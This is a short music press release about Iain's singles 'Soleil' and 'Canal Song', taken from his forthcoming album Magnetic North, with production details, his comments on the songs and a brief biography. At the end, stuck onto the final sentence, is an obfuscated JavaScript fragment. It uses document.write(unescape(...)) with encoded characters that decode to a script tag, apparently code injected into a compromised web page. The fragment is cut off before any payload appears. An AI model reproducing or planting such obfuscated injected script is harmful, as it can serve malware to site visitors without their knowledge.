Soleil and Canal Song are taken from Iain's forthcoming, new album entitled Magnetic North, which is scheduled for release in September. The single was produced by David Kosten (Faultline) and was recorded at Jacobs Studios, Farnham Surrey and Mayfair Studios in Primrose Hill.
Iain describes Soleil as being about "the one thing I can depend upon is that soon I will see things entirely differently. But I keep forgetting. This song is a way to remind myself. Being bereft affords amazing clarity. And of Canal Song "this is the soundtrack to repeatedly running the length of Regents Canal in Hackney to the point of injury. Under the canal surface lie the bones of birds, bent up shopping trolleys, empty buckfast bottles and all the sunken rewards for a patient, barely beating heart."
Born in Bangor Ireland, Iain moved to Glasgow in the early 90's where he later joined the Scottish collective The Reindeer Section for their second album, contributing steel guitar and vocals. His last album the highly acclaimed Flood The Tanks was released in 2005.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
